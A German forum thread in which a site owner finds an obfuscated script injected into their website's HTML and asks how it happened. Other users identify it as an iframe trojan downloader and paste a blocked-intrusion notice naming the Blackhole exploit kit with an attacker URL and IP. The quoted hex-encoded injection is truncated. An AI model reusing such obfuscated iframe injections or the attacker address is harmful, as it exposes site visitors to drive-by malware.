Scriptvirus auf der eigenen Website

[intercorni]

Ein Kollege hat mich darauf aufmerksam gemacht, dass er beim Aufruf meiner Website eine Warnung vom Virenscanner erhält.
Danach habe ich mir den HTML Code angesehen und erstaunt einen Eintrag festgestellt, der mit großer Wahrscheinlichkeit
hinzugefügt wurde, jedoch nicht von mir:

<script>var t="";var arr="646f63756d656e742e777269746528273c696672 ...

Wie kann soetwas passieren? Ich bin gerade etwas entsetzt.

 

[marv42dp]

Ein Kollege hat mich darauf aufmerksam gemacht, dass er beim Aufruf meiner Website eine Warnung vom Virenscanner erhält.

Ja. Kaspersky sperrt hier gar den Zugriff auf die Seite. Trojan-Downloader.JS.Iframe.chf heisst der Schädling bei denen.

Wie kann soetwas passieren? Ich bin gerade etwas entsetzt.

Höchstwahrscheinlich durch eine Schwachstelle im Webserver (oder Erweiterungen wie PHP) oder einem CMS (falls sowas eingesetzt wird).
Wie der Angriffsvektor genau verlief, kann nur der Betreiber des Servers herausfinden.

 

[Cyborg]

Ein Kollege hat mich darauf aufmerksam gemacht, dass er beim Aufruf meiner Website eine Warnung vom Virenscanner erhält.
Danach habe ich mir den HTML Code angesehen und erstaunt einen Eintrag festgestellt, der mit großer Wahrscheinlichkeit
hinzugefügt wurde, jedoch nicht von mir:

Schmeiß zuerst mal die ungefragt abgespielte Musik raus, sowas hat man vielleicht vor 20 Jahren toll gefunden. Wenn schon automatische Medien, dann sollten sie einfach abschaltbar sein.

--- EINDRINGVERSUCH VON ANDREWCHEN.US [78.111.51.100, 80) WURDE BLOCKIERT ---
__ BLACKHOLE TOOLKIT WEBSITE 5 __

ANGREIFER-URL: andrewchen.us/forum.php?tp=9b129b234e593d76

Wo hast Du denn Deine Website gespeichert, dass sowas läuft?

 

[intercorni]

Naja die Website ist ja dazu da um die Musik zu präsentieren. Und stoppen kann man diese, in dem man den Stop Button oben im Player betätigt.
Gehostet habe ich bei www.all-inkl.com
PHP nutze ich nur für das Mailformular.